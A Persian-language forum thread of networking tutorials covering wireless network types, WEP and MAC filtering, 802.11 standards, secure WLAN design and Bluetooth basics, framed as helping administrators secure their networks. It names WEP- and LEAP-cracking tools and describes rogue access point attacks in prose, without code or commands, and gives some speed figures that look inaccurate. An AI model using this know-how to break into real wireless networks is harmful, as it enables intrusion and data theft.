0

آموزش های تخصصی شبکه و امنیت و ضد امنیت

 
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

انواع شبکه های Wireless
امروزه از شبکه های بدون کابل ( Wireless ) در ابعاد متفاوت و با اهداف مختلف، استفاده می شود . برقراری يک تماس از طريق دستگاه موبايل ، دريافت يک پيام بر روی دستگاه pager و دريافت نامه های الکترونيکی از طريق يک دستگاه PDA ، نمونه هائی از کاربرد اين نوع از شبکه ها می باشند . در تمامی موارد فوق ، داده و يا صوت از طريق يک شبکه بدون کابل در اختيار سرويس گيرندگان قرار می گيرد. در صورتی که يک کاربر ، برنامه و يا سازمان تمايل به ايجاد پتاسيل قابليـت حمل داده را داشته باشد، می تواند از شبکه های بدون کابل استفاده نمايد . يک شبکه بدون کابل علاوه بر صرفه جوئی در زمان و هزينه کابل کشی ، امکان بروز مسائل مرتبط با يک شبکه کابلی را نخواهد داشت . 
از شبکه های بدون کابل می توان در مکان عمومی ، کتابخانه ها ، هتل ها ، رستوران ها و مدارس استفاده نمود . در تمامی مکان های فوق ، می توان امکان دستيابی به اينترنت را نيز فراهم نمود . يکی از چالش های اصلی اينترنت بدون کابل ، به کيفيت سرويس ( QoS ) ارائه شده برمی گردد . در صورتی که به هر دليلی بر روی خط پارازيت ايجاد گردد ، ممکن است ارتباط ايجاد شد ه قطع و يا امکان استفاده مطلوب از آن وجود نداشته باشد . 

انواع شبکه های wireless 


  • <LI dir=rtl> WLANS:Wireless Local Area Networks . شبکه های فوق ، امکان دستيابی کاربران ساکن در يک منطقه محدود نظير محوطه يک دانشگاه و يا کتابخانه را به شبکه و يا اينترنت ، فراهم می نمايد . 
    <LI dir=rtl>WPANS:Wireless Personal Area Networks . در شبکه های فوق ، امکان ارتباط بين دستگاههای شخصی ( نظير laptop ) در يک ناحيه محدود ( حدود 914 سانتی متر ) فراهم می گردد . در اين نوع شبکه ها از دو تکنولوژی متداول Infra Red ) IR) و ( Bluetooth ( IEEE 802.15 ، استفاده می گردد .
    <LI dir=rtl>WMANSWireless Metropolitan Area Networks . در شبکه های فوق ، امکان ارتباط بين چندين شبکه موجود در يک شهر بزرگ فراهم می گردد . از شبکه های فوق، اغلب به عنوان شبکه های backup کابلی ( مسی ،فيبر نوری ) استفاده می گردد .
  • WWANS:Wireless Wide Area Networks. در شبکه های فوق ، امکان ارتباط بين شهرها و يا حتی کشورها و از طريق سيستم های ماهواره ای متفاوت فراهم می گردد . شبکه های فوق به سيستم های 2G ( نسل دوم ) معروف شده اند .

امنيت 
برای پياده سازی امنيـت در شبکه های بدون کابل از سه روش متفاوت استفاده می شود : 


  • <LI dir=rtl> WEP : Wired Equivalent Privacy . در روش فوق ، هدف توقف ره گيری سيگنال های فرکانس راديوئی توسط کاربران غير مجاز بوده و برای شبکه های کوچک مناسب است . علت اين امر به عدم وجود پروتکل خاصی به منظور مديريت "کليد " بر می گردد. هر "کليد " می بايست به صورت دستی برای سرويس گيرندگان تعريف گردد. بديهی است در صورت بزرگ بودن شبکه ، فرآيند فوق از جمله عمليات وقت گير برای هر مدير شبکه خواهد بود . WEP ، مبتنی بر الگوريتم رمزنگاری RC4 است که توسط RSA Data System ارائه شده است . در اين رابطه تمامی سرويس گيرندگان و Aceess Point ها بگونه ای پيکربندی می گردند که از يک کليد مشابه برای رمزنگاری و رمزگشائی استفاده نمايند . 
    <LI dir=rtl> SSID:Service Set Identifier. روش فوق به منزله يک "رمزعبور" بوده که امکان تقسيم يک شبکه WLAN به چندين شبکه متفاوت ديگر که هر يک دارای يک شناسه منحصر بفرد می باشند را فراهم می نمايد . شناسه های فوق، می بايست برای هر access point تعريف گردند. يک کامپيوتر سرويس گيرنده به منظور دستيابی به هر شبکه ، می بايست بگونه ای پکربندی گردد که دارای شناسه SSID مربوط به شبکه مورد نظر باشد . در صورتی که شناسه کامپيوتر سرويس گيرنده با شناسه شبکه مورد نظر مطابقت نمايد ، امکان دستيابی به شبکه برای سرويس گيرنده فراهم می گردد .
  • فيلترينگ آدرس های ( MAC ( Media Access Control : در روش فوق ، ليستی از آدرس های MAC مربوط به کامپيوترهای سرويس گيرنده، برای يک Access Point تعريف می گردد . بدين ترتيب ، صرفا" به کامپيوترهای فوق امکان دستيابی داده می شود . زمانی که يک کامپيوتر درخواستی را ايجاد می نمايد ، آدرس MAC آن با آدرس MAC موجود در Access Point مقايسه شده و در صورت مطابقت آنان با يکديگر ، امکان دستيابی فراهم می گردد . اين روش از لحاظ امنيتی شرايط مناسبی را ارائه می نمايد ، ولی با توجه به اين که می بايست هر يک از آدرس های MAC را برای هر Access point تعريف نمود ، زمان زيادی صرف خواهد شد . استفاده از روش فوق، صرفا" در شبکه های کوچک بدون کابل پيشنهاد می گردد .

تجهيزات و پيکربندی يک شبکه Wireless 
سخت افزار مورد نياز به منظور پيکربندی يک شبکه بدون کابل به ابعاد شبکه مورد نظر بستگی دارد . عليرغم موضوع فوق ، در اين نوع شبکه ها اغلب و شايد هم قطعا" به يک access point و يک اينترفيس کارت شبکه نياز خواهد بود . در صورتی که قصد ايجاد يک شبکه موقت بين دو کامپيوتر را داشته باشيد ، صرفا" به دو کارت شبکه بدون کابل نياز خواهيد داشت . 

Access Point چيست ؟ 
سخت افزار فوق ، به عنوان يک پل ارتباطی بين شبکه های کابلی و دستگاههای بدون کابل عمل می نمايد . با استفاده از سخت افزار فوق ، امکان ارتباط چندين دستگاه به منظور دستيابی به شبکه فراهم می گردد .access point می تواند دارای عملکردی مشابه يک روتر نيز باشد . در چنين مواردی انتقال اطلاعات در محدوده وسيعتری انجام شده و داده از يک access point به access point ديگر ارسال می گردد . 


يک نمونه دستگاه access point 

کارت شبکه بدون کابل
هر يک از دستگاههای موجود بر روی يک شبکه بدون کابل ، به يک کارت شبکه بدون کابل نياز خواهند داشت . يک کامپيوتر Laptop ، عموما" دارای يک اسلات PCMCIA است که کارت شبکه درون آن قرار می گيرد . کامپيوترهای شخصی نيز به يک کارت شبکه داخلی که معمولا" دارای يک آنتن کوچک و يا آنتن خارجی است ، نياز خواهند داشت .آنتن های فوق بر روی اغلب دستگاهها ،اختياری بوده و افزايش سيگنال بر روی کارت را بدنبال خواهد داشت .


يک نمونه کارت شبکه بدون کابل

پيکربندی يک شبکه بدون کابل
به منظور پيکربندی يک شبکه بدون کابل از دو روش متفاوت استفاده می گردد : 


  • <LI dir=rtl>روش Infrastructure : به اين نوع شبکه ها، hosted و يا managed نيز گفته می شود . در اين روش از يک و يا چندين access point ( موسوم به gateway و يا روترهای بدون کابل ) که به يک شبکه موجود متصل می گردند ، استفاده می شود . بدين ترتيب دستگاههای بدون کابل، امکان استفاده از منابع موجود بر روی شبکه نظير چاپگر و يا اينترنت را بدست می آورند .
  • روش Ad-Hoc : به اين نوع شبکه ها ، unmanaged و يا peer to peer نيز گفته می شود . در روش فوق هر يک از دستگاهها مستقيما" به يکديگر متصل می گردند.مثلا" يک شخص با دارا بودن يک دستگاه کامپيوتر laptop مستقر در محوطه منزل خود می تواتند با کامپيوتر شخصی موجود در منزل خود به منظور دستيابی به اينترنت ، ارتباط برقرار نمايد .

پس از تهيه تجهيزات سخت افزاری مورد نياز به منظور ايجاد يک شبکه بدون کابل ، در ادامه می بايست تمامی تجهيزات تهيه شده را با هدف ايجاد و سازماندهی يک شبکه به يکديگر متصل تا امکان ارتباط بين آنان فراهم گردد . قبل از نصب و پيکربندی يک شبکه بدون کابل ، لازم است به موارد زير دقت نمائيد : 


  • <LI dir=rtl>تهيه درايورهای مربوطه از فروشنده سخت افزار و کسب آخرين اطلاعات مورد نياز <LI dir=rtl>فاصله بين دو کامپيوتر می بايست کمتر از يکصد متر باشد . <LI dir=rtl>هر يک از کامپيوترهای موجود می بايست بر روی يک طبقه مشابه باشند .
  • استفاده از تجهيزات سخت افزاری مربوط به يک توليد کننده ، دارای مزايا و معايبی است . در اين رابطه پيشنهاد می گردد ليستی از ويژگی های هر يک از سخت افزارهای مورد نياز عرضه شده توسط توليد کنندگان متعدد تهيه شود تا امکان مقايسه و اخذ تصميم مناسب، فراهم گردد .

مراحل لازم به منظور نصب يک شبکه ( فرضيات : ما دارای يک شبکه کابلی موجود هستيم و قصد پياده سازی يک شبکه بدون کابل به منظور ارتباط دستگاههای بدون کابل به آن را داريم ) :


  • <LI dir=rtl>اتصال access point به برق و سوکت مربوط به شبکه اترنت 
    <LI dir=rtl>پيکربندی access point ( معمولا" از طريق يک مرورگر وب ) تا امکان مشاهده آن توسط شبکه موجود فراهم گردد . نحوه پيکربندی access point بستگی به نوع آن دارد.
  • پيکربندی مناسب کامپيوترهای سرويس گيرنده به منظور ارتباط با access point ( در صورتی که تمامی سخت افزارهای شبکه بدون کابل از يک توليد کننده تهيه شده باشند ، عموما" با تنظيمات پيش فرض می توان شبکه را فعال نمود . به هر حال پيشنهاد می گردد همواره به راهنمای سخت افزار تهيه شده به منظور پيکربندی بهينه آنان ، مراجعه گردد ) .

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:41 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

امنيت شبكه هاي بيسيم: هكرها چه چيزي مي دانند كه شما نمي دانيد؟ 
شبكه هاي بيسيم به سرعت در حال رشد و توسعه مي باشند و غالب شركت ها به اين گونه از شبكه ها روي آورده اند. فراگير شدن ارتباط بيسيم، طراحي ساختار امنيتي در محدوده پوشش اين نوع شبكه ها را اجتناب ناپذير مي نمايد. 
در دنياي بيسيم چيزي به عنوان زير ساخت فيزيكي مانند در، ديوار، قفل و ... وجود ندارد تا بتوان با استفاده از اين وسائل از دسترسي هاي غير مجاز به لايه 2(Media Access) يا لايه 1 (Physical) جلوگيري بعمل آورد. براي دسترسي به منابع شبكه هاي بيسيم كافي است كه يك حمله كننده فقط در مجاورت اين شبكه قرار گيرد بدون آنكه به محل حفظ اطلاعات مهم سازمان دسترسي فيزيكي داشته باشد و سه ويژگي مهم اطلاعات را از بين ببرد:



(Integrity, Confidentiality, Availability)


مفاهيم پايه اي 802.11:
802.11 از استانداردهاي پياده سازي شبكه بيسيم مي باشد كه توسط IEEE ارائه شده است. اين استاندارد شبيه استاندارد 802.3 روي Ethernet مي باشد كه در آن پروتكل هاي لايه 1و2 استفاده شده است.
توسط تكنولوژي CSMA/CD روي Ethernet، نودهاي شبكه بيسيم نيز توسط آدرس MAC حك شده روي كارت هاي شبكه، آدرس دهي مي شوند. اگر چه، 802.11 از سيم به عنوان رسانه در لايه 1 استفاده نمي كند و نودها در استاندارد فوق به صورت بيسيم و در دامنه اي كه توسط دستگاه هاي بيسيم تعريف مي شوند با يكديگر تبادل اطلاعات مي نمايند.
شبكه هايي كه عمدتأ بر مبناي استاندارد 802.11 طراحي مي شوند به يك يا چند Access Point نياز دارند.AP دستگاهي است كه امكان ارتباط بين نودهاي شبكه بيسيم با يكديگر و با شبكه مبتني بر سيم را برقرار مي سازد. در اين نوع تنظيم كه به Infrastructure Mode معروف است، نودهاي بيسيم براي ارتباط با يكديگر و يا نودهاي موجود در شبكه مبتني بر سيم، مي بايست از اين AP ها عبور نمايد. همچنين شبكه هاي بيسيم مي توانند به صورت مستقيم و بر پايه شبكه هاي Peer-To-Peer با يكديگر و بدون نياز به AP ها ارتباط داشته باشند.
امروزه سه نوع از استاندارد هاي بيسيم در شبكه پياده سازي مي شود كه اين سه نوع عبارتند از:
-802.11b
802.11a-
802.11g-

802.11b : اولين استاندارد در شبكه هاي بيسيم استاندارد 802.11b بود.
سرعت در اين ارتباط 11 مگابيت بر ثانيه و از فركانس 2.4 گيگا هرتز استفاده شده است و تا فاصله 300 فوت يا 91 متر را پوشش مي دهد. 
: 802.11aدر تجهيزات مورد استفاده در استاندارد 802.11a پهناي باند مورد استفاده بهبود داده شده است. در اين استاندارد، سرعت 56mbps و فركانس 5GHz مي باشد و باعث مي شود تا ناسازگاري كمتري با تجهيزات معمول مانند تلفن هاي بيسيم و يا مايكرو ويو ها داشته باشد.
مشخصه 802.11a اجازه ارتباط همزمان تا 12 كانال در مقايسه با 3 كانال در استاندارد 2.4 GHz مي دهد. همچنين تعداد بيشتري از ايستگاه هاي كاري در هر شبكه را پشتيباني مي كند. اگر چه به دليل استفاده از فركانس جداگانه ، استاندارد 802.11a تجهيزات 802.11b را پشتيباني نمي كند. ضمنأ تجهيزات اين استاندارد گران تر و كاهش فاصله را در مقايسه با فركانس 2.4 گيگا هرتز دارد. (در حدود 50 feet و با سرعت 54mbps full)
:802.11.gبسياري از شركت ها علاقمند هستند تا پهناي باند مورد نياز خود را متناسب با استاندارد 802.11g پياده سازي نمايند. اين استاندارد با سرعت 56 مگابيت بر ثانيه و با فركانس 2.4 گيگا هرتز مي باشد و قابليت پشتيباني از استاندارد 802.11b را نيز دارا مي باشد.
محدوده تحت پوشش در اين استاندارد همانند استاندارد 802.11a (300 feet) مي باشد و در سرعت 54 مگابيت بر ثانيه و به صورت full duplex تا محدوده 100 feet را پوشش مي دهد.

امن سازي شبكه هاي بيسيم:

با وجود امكاناتي كه در شبكه هاي مبتني بر 802.11 ارائه شده است ولي اين واقعيت وجود دارد كه، چون براي انتقال اطلاعات در اين شبكه ها هيچ حد و مرز فيزيكي وجود ندارد و اين ترافيك توسط هوا منتقل مي شود به اين دليل اين نوع شبكه ذاتأ نا امن هستند.
از تمام عناصري كه براي ايجاد امنيت در شبكه سيم كشي شده استفاده شده مي توان در شبكه هاي بيسيم نيز براي برقراري امنيت استفاده نمود. نكته مهمي كه در شبكه هاي بيسيم از لحاظ امنتي داراي اهميت مي باشد طراحي اين گونه از شبكه هاي مي باشد. در ادامه به چگونگي طراحي امن شبكه هاي بيسيم مي پردازيم.
طراحي شبكه: 

يكي از موارد مهم كه در طراحي شبكه مي بايست در نظر گرفته شود، چگونگي طراحي و نحوه ارتباط با شبكه سيم كشي شده است.
راههاي زيادي جهت امن كردن شبكه و همين طور براي به خطر انداختن امنيت آن وجود دارد.
با طراحي و بكار گيري يك استراتژي محكم در شبكه هاي بيسيم ميتوان از دسترسي هكرها به شبكه جلوگيري بعمل آورد همچنين با اعمال كنترل هاي بيشتر روي بخش بيسيم شبكه، شبكه سيم كشي شده را نيز محافظت نمود تا هكرها از اين طريق نيز نتوانند وارد شبكه شوند. استفاده از فايروال و روتر در شبكه بيسيم همانند شبكه هاي سيم كشي شده نيز توصيه مي شود.

جداسازي توسط مكانيزم هاي جداسازي:

بهدليل اينكه معمولأ AP ها رابط بين شبكه بيسيم و سيم كشي شده هستند، ايستگاه هاي كاري موجود در دو طرف اين AP ها معمولأ در يك Broadcast Domain مي باشند. با اين توضيحات، هكر شبكه بيسيم ميتواند با استفاده از روشهاي موجود روي شبكه هاي سيم كشي شده مانندARP cache Poisoning نسبت به اجراي Exploit روي ترافيك Broadcast اقدام نمايد. همچنين هكر مي تواند ايستگاه هاي بيسيم ديگري را كه به APمتصل هستند را مورد حمله قرار دهد. اين اتفاق در مورد ايستگاه هاي كاري موجود روي شبكه سيم كشي شده كه به شبكه بيسيم متصل هستند روي خواهد داد.
به دليل آسيب پذيري هاي زيادي كه در شبكه هاي بيسيم و با توجه به نحوه پياده سازي اين شبكه ها، اين فكر در ذهن ايجاد مي شود كه شبكه هاي سيم كشي ايزوله شده از اين شبكه ها امن تر مي باشند.
همانطوري كه در شكل زير مشاهده ميشود، طراحي ساده ولي با يك نكته اصلي و آن اينكه، در اين طرح، دسترسي مستقيم لايه 2 و اتصال به منابع شبكه براي تمامي ايستگاه هاي كاري بيسيم ميسر مي شود و اين امر مشكلات امنيتي را در پي خواهد داشت. حداقل پيشنهادي كه براي امنيت در اين طرح مورد نظر مي باشد، جدا سازي و ايزوله كردن شبكه بيسيم از شبكه داخلي در VLAN جداگانه و با قرار دادن مكانيزم هاي لايه 3 در شبكه مي باشد.


طراحي بهتر شبكه با درك مفهوم Wireless-DMZ كه در شكل زير نشان داده شده است انجام خواهد شد. با قرار دادن APها در ناحيه امنيت خاص، پياده سازي كنترل هاي لايه3 و كنترل هاي دسترسي مانند پياده سازي فايروال مي توان به امنيت بالاتري دست يافت.
به طور مثال اگر تمام AP ها به يك سوئيچ (يا دو سوئيچ براي افزونگي(Redundancy)) متصل و سپس سوئيچ به فايروال متصل شود، ما يك نقطه كنترلي يا Layer 3+ بين شبكه داخلي و شبكه APخواهيم داشت.



با توجه به شبكه فوق، اگر هكري ايستگاه هاي بيسيم و يا حتي AP ها را تحت كنترل خود در آورد، محدود به شبكه خود (شبكه خارج از فايروال) و به سرويسهايي كه در فايروال باز گذاشته شده مي باشد. بعلاوه هرگونه ترافيك ورودي و خروجي در فايروال ثبت شده و بدين ترتيب ما رد مميزي حتي و با بررسي اين گزارشات شانس بيشتري براي جلوگيري از حملات خواهيم داشت. 
و اگر AP ها داراي رده امنيت مختلفي باشند مي توان هركدام را در ناحيه امنيتي خود قرار داده و به فايروال مربوطه با چند interface مطابق شكل زير متصل نمود. با اين طرح منابع هركدام از شبكه هاي بيسيم در مقابل شبكه هاي ديگر محافظت مي شود.



طراحي فوق براي محيط هاي آموزشي كه استاد و دانشجويان داراي دسترسي هاي مختلفي به منابع شبكه مي باشند مناسب است.

در اين قسمت به معرفي چند ابزار مي پردازيم که نمايانگر نا امني و راه هاي سوء استفاده از شبکه هاي محلي بي سيم است ٬ با دانستن اين موارد مديران شبکه بهتر مي توانند در مورد امنيت شبکه خود تصميم گيري کنند.

ابزار هاي Sniff وScan شبكه هاي محلي بي سيم 

ابزارهاي مبتني بر ويندوز و ساده و رايگان همانند NetStumbler امواج هوا را scan كرده و با جستجوي access point هايي كه Access ID خود را broadcast مي كنند ٬ راه بسيار ساده اي براي كشف شبكه هاي باز فراهم مي كنند. ابزار هاي پيشرفته تري همانند Kismet نيز بر بستر لينوكس معرفي شده اند. Kismet بصورتي نامحسوس ( Passive ) ترافيك شبكه را ذخيره و مانيتور مي كند. هر دوي اين نرم افزار ها Netstumbler و Kismet از اطلاعات GPS ( سيستم موقعيت يابي جهاني ) براي نگاشت مكان دقيق شبكه هاي محلي بي سيم استفاده مي كنند.


Driver ها و مهاجمان از اين ابزار استفاده مي كنند تا وجود فيزيكي شبكه بي سيم را تشخيص دهند ٬ فارغ از اينكه اين شبكه ها امن هستند يا خير .
War Driver ها كساني هستند كه با يك laptop يا وسيله اي مشابه داخل و اطراف شهرها مي گردند تا سيگنالهايي از شبكه اي بي سيم بيابند. سپس اين اطلاعات بر روي وب سايتي مانندwww.wigle.net ( كه در حال حاضر بيش از 700,000 access point و 1,100,000 شبكه بي سيم را ليست كرده است ) و www.wifinder.com قرار خواهد گرفت . هكرها از اين اطلاعات و ليست ها استفاده مي كنند تا access point هايي را با SSID ٬ Mac آدرس يا شماره فيزيكي مشترك در يك آدرس و موقعيت بيايند.

آنتن ها 

براي اتصال با شبكه هاي محلي بي سيم از راه دور ٬ هكر ها يا از انواع بسيار متنوع آنتن هاي تجاري استفاده مي كنند ٬ يا اينكه به راحتي آنتن هاي خود را با قوطي خالي چيپس Pringle و يا هر وسيله مشابه فلزي ديگري مي سازند. اين آنتن ها هكرها را قادر مي سازند تا امواج 802.11 را از فاصله چند هزارمتري دريافت كنند . آنها مي توانند به شبكه دسترسي داشته باشند در حالي كه كاملا دور از چشم همه قرار دارند. 


ابزار هايي كه رمزنگاري WEP را مي شكنند

هكرها از ابزاري همانند WEPwedgie ٬ WEPCrack ٬ WEPAttack ٬ BSD-Airtools و AirSnort براي شكستن رمزنگاري استاندارد WEP ( Wired Equivalent Privacy ) استفاده مي كنند . اين ابزار از آسيب پذيريهاي(vulnerability ) موجود درالگوريتم رمزنگاري WEP استفاده مي كنند ٬ بدين شكل كه بصورت نامحسوس ( Passive ) ترافيك شبكه محلي بي سيم را زير نظر مي گيرند تا زمانيكه اطلاعات كافي براي تشخيص الگو ( pattern) بدست آورند. سپس از اين اطلاعات براي شكستن كليد (KEY) رمزنگاري استفاده مي كنند. WEPwedgie و BSD-Airtools زمان طولاني مورد نياز براي شكستن كليد هاي بلند WEP را به حد اقل مي رسانند و اين زمان را با استفاده از تكنيك تزريق ترافيك ( traffic insertion ) ٬ از چند روز به چند ساعت تقليل مي دهند . در اين روش حجم وسيعي ترافيك كاذب براي بازيابي كليد ايجاد مي شود . معمولا" براي برپايي يك WEP دستي ٬ اغلب تنها از يك كليد منفرد از چهار كليد براي گسترش شبكه استفاده مي كنند ٬ كه در مدت زمان بسيار كوتاه تري مي توان شبكه را كاملا" تسخير كرد. با وجود آسيب پذيري ها ٬ WEP همچنان مورد استفاده قرار مي گيرد. نسل جديد رمزنگاري ها از پروتكل TKIP استفاده مي كند كه امتيازاتي همچون Per Packet Key Mixing ٬ Integrity Check و يك مكانيسم Re-Keying را فراهم مي نمايد . كليد ها به اندازه اي زود تغيير مي كنند كه مانع تسخير و سوء استفاده شوند. اما چون اطلاعات روي هوا فرستاده مي شود امكان دسترسي به آن وجود دارد و اگر رمزنگاري نشده باشد ٬ به راحتي قابل استفاده خواهد بود.

ابزارشكستن احراز هويت ( Authentication )

هكر ها از ابزارهايي مانند THC-LEAPCracker براي شكستن يا تسخير انواع مختلف و متداول پروتكلهاي احراز هويت مبتني بر پورت براي 802.11X بي سيم ٬ مانند پروتكل LEAP ( Lightweight Extensible Authentication Protocol ) و يا PEAP ( Protected Extensible Authentication Protocol ) استفاده مي كنند .
اين پروتكل ها براي استفاده شبكه هاي محلي با بستر سيمي ٬ كه از نظر فيزيكي در محيطي امن قرار دارند طراحي شده اند. زماني كه اطلاعات در محيط اشتراكي و غير قابل كنترل بي سيم پراكنده مي گردد ٬ هكر ها به راحتي مي توانند گواهينامه هاي احراز هويت را spoof ٬ jump in the middle و يا بوكشي كنند.

حملات متداول شبكه هاي محلي بي سيم 

اين قسمت چند حمله متداول بر روي شبكه هاي محلي بي سيم را بيان مي كند كه نمايانگر خطرات و ريسكهاي مشخص آن مي باشد. با گوناگوني و تنوع فعلي ابزار هاي هك كه بصورت گسترده اي در اينترنت موجود مي باشند حتي يك هكر نو آموز و تازه كار مي تواند بسياري از حملات منتشر شده را اجرا نمايد.

تماس هاي تصادفي يا مغرضانه 

يك هكر مي تواند يك کاربر ساده را وادار نمايد تا بصورت کاملا نا خودآگاه به يك شبكه spoof شده802.11 متصل شود و يا اينكه تنظيمات اين دستگاه را به گونه اي تغيير دهد که که در يک شبکه ad-hoc قرار گيرد. براي شروع ٬ يک هکر از يک laptop بعنوان يک access point نرم افزاري استفاده مي کند ٬ که براي اين کار از ابزارهاي رايگاني همچون HostAP ٬ AirSnarf ٬ Hotspotter و يا ابزارهاي موجود تجاري مي توان استفاده کرد. ( بعنوان مثال شرکت هايي همچون PCTel نرم افزار هاي تجاري توليد مي کنند که تجهيزات 802.11 را به access point تبديل مي کنند.)

همينطور که کامپيوتر قرباني يک درخواست براي اتصال به يک access point را broadcast مي کند٬ access point نرم افزاري هکر به اين درخواست پاسخ مي دهد و يک اتصال بين اين دو برقرار مي گردد. سپس اين access point نرم افزاري يک آدرس IP به اين کامپيوتر اختصاص مي دهد . پس از اينکه اين کار انجام شد٬ هکر مي تواند کامپيوتر قرباني را scan کرده و در آن به گشت و گذار بپردازد ٬ اطلاعاتي را بربايد ٬ Trojan Horse و ياSpyware نصب کند ٬ و يا اگر کامپيو تر قرباني به يک شبکه مبتني بر سيم متصل باشد ٬ از اين کامپيوتر مي تواند بعنوان راه ارتباط براي نفوذ به سرور هاي ديگر اين شبکه استفاده کند.
شبکه هاي محلي بي سيم دستخوش دگرگوني فراوان هستند و اغلب ايستگاه هاي کاري نمي دانند به کدام access point متصل هستند. و از آنجايي که اغلب هيچگونه احراز هويتي براي اتصال به access point ها صورت نمي گيرد٬ ايستگاه هاي کاري مي توانند فريب خورده و يا مجبور به اتصال با يک access point نا امن شوند. اين يک آسيب پذيري در لايه 2 ( Data Link ) از مدل 7 لايه شبکه ( OSI:Open System Interconnection)مي باشد. نه احراز هويت لايه 3 (شبکه) هيچگونه محافظتي در مقابل آن ارائه نمي دهد و نه استفاده از شبکه هاي مجازي شخصي ***) . احراز هويت لايه 2 شبکه هاي محلي بي سيم مبتني بر 802.1x براي محافظت در مقابل ارتباطات مشکوک مي تواند مفيد باشد ولي داراي آسيب پذيري هاي زيادي است .

يک ارتباط مغرضانه و مشکوک سعي در شکستن *** و يا موازين امنيتي ندارد ٬ولي در عوض از لايه 2 براي تسلط برclient ها استفاده مي كند. براي جلوگيري از اتصال کاربرها به access point ها و شبکه هاي غير مجاز شرکت ها بايد مرتبا" امواج حوالي شبکه ي بي سيم خود را بررسي کنند تا از هرگونه خطراحتمالي مطلع شوند .

ناشر : مهندسي شبكه همكاران سيستم

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:42 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

مفاهيم شبكه هاي Bluetooth 
تكنولوژي Bluetooth استانداردي است كه ارتباط بي سيم در فواصل كوتاه را براي گسترة وسيعي از ابزارها شامل كامپيوترهاي روميزي، Laptop، PDA، موبايل، دوربين ديجيتال، چاپگر، صفحه كليد و حتي موس را ممكن مي سازد. بيش از 250 ميليون ابزار Bluetooth در حال حاضر در دنيا استفاده مي شود و پيش بيني مي شود تا دو سال آينده اين تعداد به بيش از يك بيليون افزايش يابد.

يك شبكه Personal Area Network(PAN)
Bluetooth يك تكنولوژي PAN است. از يك باند فركانس راديويي ديجيتالي كوتاه براي فراهم كردن مكانيزمي براي برقراري ارتباط بي سيم در فواصل كوتاه بر مبناي ad hoc استفاده مي كند. Bluetooth امكان تبادل سريع و مطمئن داده و صدا را فراهم مي كند. ابزارهاي با قابليت Bluetooth اين امكان را به كاربران مي دهند كه كابل را از ابزار ديجيتال موجود حذف كنند و در هم ­ريختگي كابل ها را به فراموشي بسپارند. هدف Bluetooth مرتبط كردن ابزارهاي مختلف بي سيم به يكديگر در يك محيط كوچك مثل دفتر كار يا منزل است. Bluetooth هم چنين مي تواند براي اتصال هر ابزاري به ديگري مثل اتصال يك PDA به يك موبايل استفاده شود.
Bluetooth ارزان است و مصرف انرژي پاييني دارد. 
استاندارد Bluetooth به طور موثري كارهاي زير را انجام مي دهد:
-حذف كابل و سيم بين دستگاه ها و ابزارهاي بي سيم
-تسهيل ارتباطات داده و صدا
-فراهم كردن امكان شبكه هاي ad hoc و همگام سازي بين ابزارهاي شخصي

Operating Band
ابزارهاي Bluetooth در باند 2.45 GHz ISM كار مي كنند كه براي استفاده­هاي صنعتي، علمي و پزشكي رزرو شده است. اين باند در اغلب مناطق دنيا قابل دسترس است. در امريكا و اروپا محدودة فركانس 2400 تا 2483.5 MHz با كانال هاي فركانس راديويي 79 1-MHz RF مي باشد. در عمل محدودة 2402 تا 2480 MHz استفاده مي شود. در ژاپن محدودة فركانس2472 تا 2497 MHz با كانال­هاي 23 1-MHz RF استفاده مي شود. باند مورد استفاده، مشابه باند ابزارهاي شبكه هاي محلي بي سيم و ديگر ابزارهاي سازگار با IEEE 802.11 مي باشد. جدول 1 مشخصات Bluetooth را به­طور خلاصه نشان مي دهد.


جدول 1. مشخصات کليدی تکنولوژی Bluetooth
مشخصات
توصيف
لايه فيزيکي
Frequency Hopping Spread Spectrum)FHSS(
باند فرکانسي
باند ISM (2.4 GHz-2.45GHz)
فرکانس hop
1600 hops/sec
نرخ انتقال داده
1Mbps
محدوده کاری
حدود 10 متر، قابل گسترش تا 100 متر

چگونه ابزارهاي Bluetooth را شبكه كنيم؟
شبكه هاي Bluetooth برخلاف شبكه محلي بي سيم كه از ايستگاه هاي كاري بي سيم و Access Point تشكيل مي شود، فقط از client ها يا ايستگاه هاي كاري بي ­سيم تشكيل مي شود. يك client مي تواند هر ابزار با قابليت Bluetooth فعال باشد.
ابزارهاي با قابليت Bluetooth به طور خودكار يكديگر را شناسايي كرده و شبكه تشكيل مي دهند. مشابه تمام شبكه هاي ad hoc، توپولوژي­هاي شبكه­ هاي Bluetooth مي توانند خودشان را بر يك ساختار موقت تصادفي مستقر كنند.
شبكه­ هاي Bluetooth يك ارتباط master-slave را بين ابزارها برقرار ­مي كنند. اين ارتباط يك piconet را تشكيل مي دهد. در هر piconet تا 8 ابزار Bluetooth مي توانند با هم شبكه شوند به اين صورت كه يكي از آن ها به عنوان master تعيين مي شود و تا 7 ابزار مي توانند به عنوان slave مستقيماً به شبكه متصل شوند. كار تنظيم و كنترل شبكه بر عهدة masterاست.
ابزارهاي هر piconet روي كانال يكسان كار مي كنند. اگرچه در هر piconet فقط يك master داريم، ولي slave يك شبكه مي تواند در شبكه ديگري به عنوان master عمل كند، بنابراين زنجيره اي از شبكه­ ها به وجود مي آيد. اين مجموعه از piconetها كه scatternet ناميده مي شود، اجازه مي دهند كه چندين ابزار در فاصله وسيعي با هم شبكه شوند. اين ارتباط هم چنين يك توپولوژي پويا كه ممكن است حين هر نشست تغيير كند را ممكن مي سازد: همان طور كه يك ابزار به master نزديك يا از آن دور مي شود، ارتباطات بين ابزارها در شبكه با توپولوژي تغيير مي كند. شكل 1 يك piconet و scatternet را نشان مي دهد.



 
شکل 1. شمايی از piconet و scatternet

محدودة ابزارهاي Bluetooth
محدودة كار ابزارهاي Bluetooth به كلاسي كه در آن قرار مي گيرند بستگي دارد و اين­كه در چه كلاسي قرار مي گيرند به ميزان قدرت آن ها بستگي دارد.


